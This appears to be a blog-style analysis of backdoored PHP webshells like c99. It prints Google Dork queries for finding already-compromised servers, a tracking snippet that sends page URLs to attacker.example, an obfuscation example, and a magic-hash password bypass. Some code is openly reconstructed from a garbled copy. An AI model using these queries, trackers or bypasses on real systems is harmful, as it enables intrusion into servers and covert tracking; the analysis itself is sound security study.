
Google's main crawler is called Googlebot. To be more specific, a "crawler" is a generic term for any program (such as a robot or spider) used to automatically discover and scan websites by following links from one webpage to another. Google's documentation lists the common Google crawlers you may see in your referrer logs and how each should be named in robots.txt, the robots meta tags, and the X-Robots-Tag HTTP directives; if you want more fine-grained control, you can target those names individually.

Crawlers index webshells like any other page, which means that when you google a web backdoor and find one, it has already been found many times before you. The compromised machines found this way are usually not that interesting, because anything valuable is better protected (well, not always!), and the Google crawlers only spot it after a relatively long time. (Source: c99.) Nowadays someone would not even have to hack a web server: the only thing they have to do is google already-compromised servers using Google Dorks, and boom, they are inside the compromised machine. When reviewing such a shell's code, pay attention to images, scripts, CSS, external requests, mail functions, and encoded code.
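A Google Dork is nothing more than a crafted search query matching strings that a shell's interface prints. As an illustration (these exact queries are assumptions on my part, though both patterns have circulated publicly for years):

    intitle:"c99shell" inurl:c99.php
    "Safe-mode: OFF (not secure)" c99shell

Every hit for such a query is a server where the shell is already installed, indexed, and reachable by anyone.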

When using such tools, be careful: backdoors may be hidden inside them. Crimeware like Smoke Loader (backdoored via a SQL injection), CrimePack (SQL injection) or Zeus (remote access via an upload flaw) has been trojaned this way, and more sophisticated piracy tools have vulnerabilities too. A flaw combined with an inventory of infected websites is an easy way for a webshell's author to control a network of servers (e.g. to build a botnet) while leaving the dirty work of compromising systems to others. Script kiddies, lamers, and inattentive pirates will use webshells without looking carefully at the code.

The malicious tracking script embedded in the shell looks like this (reconstructed from a garbled copy; the tracker URL is a placeholder, not the original):

    a = new /**/ Image();
    a.src = 'http://attacker.example/?' + escape(document.location);

The goal is always the same: each time the page is displayed, the website hosting the webshell makes a request to the malicious address and sends along the URL it was loaded from, permitting the author to know every website hosting the backdoored webshell. The /**/ comment splits the statement, presumably to dodge naive signature scans.

The next block of code is too mangled in this copy to quote: only set_time_limit(0), a foreach($host_allow as $k => $v) loop and a 500 constant survive, which points to a host allow-list gate like the sketch below. And unpacking such code can be a lot more complex than a single base64_decode() or hex-to-ASCII pass; a layered wrapper is sketched after the gate. In fact, the flaw was deliberately inserted into the code to permit the webshell's author to bypass it.
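A minimal sketch of that host allow-list gate, assuming everything beyond the surviving fragments (the fnmatch() matching, the variable values, the fake 404) is reconstruction:

    <?php
    // Only set_time_limit(0) and the foreach over $host_allow survive in
    // the original; the rest of this gate is assumed for illustration.
    set_time_limit(0);                          // lift PHP's execution time cap
    $host_allow = array('*.attacker.example');  // hypothetical allow-list
    $allowed = false;
    foreach ($host_allow as $k => $v) {
        // fnmatch() applies shell-style wildcards to the client's reverse DNS name
        if (fnmatch($v, gethostbyaddr($_SERVER['REMOTE_ADDR']))) {
            $allowed = true;
        }
    }
    if (!$allowed) {
        header('HTTP/1.0 404 Not Found');       // pretend the shell is not here
        exit;
    }

Gates like this keep casual visitors and scanners out while the author's own hosts sail through.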
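To see why unpacking is rarely a single call, here is a self-contained illustration (the payload string is invented): a dropper wraps its source in deflate-plus-base64, and the analyst peels the layers in reverse order, printing instead of executing:

    <?php
    // Pack a payload the way a dropper might: compress, then base64-encode.
    $inner = "echo 'hidden layer';";
    $blob  = base64_encode(gzdeflate($inner));

    // Unpack safely: reverse the layers and echo the result instead of
    // eval()'ing it. Real samples nest several such layers and mix in
    // str_rot13() or custom XOR loops, so one pass is rarely enough.
    $layer = gzinflate(base64_decode($blob));
    echo $layer;   // prints the decoded source; never eval() it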


Attackers upload this kind of webshell to a web server in order to gather information and, above all, to execute commands with the web user's privileges (e.g. www-data). The shell is protected by a customizable password, so access to the interface is limited to people who know it. But the password verification mechanism is vulnerable.
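The exact check is not reproduced here, so as an illustration only: a classic way to write such a deliberately weak gate in PHP is a loose (==) comparison against an md5 hash. When both sides are numeric strings of the form 0e followed by digits, PHP compares them as the number zero, so certain inputs walk straight past any password:

    <?php
    // Illustrative only -- not the actual c99 source.
    $md5_pass = '0e830400451993494058024219903391'; // md5('QNKCDZO'), a "magic hash"

    // Loose comparison: '0e...' strings are numeric, so == compares 0 with 0.
    // The input '240610708' also hashes to an 0e... string and gets in free.
    if (md5($_POST['pass'] ?? '') == $md5_pass) {
        echo 'access granted';
    } else {
        die('access denied');
    }

A strict comparison (=== or hash_equals()) closes the hole, which is exactly why its absence in a shell that otherwise hides its internals smells deliberate.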
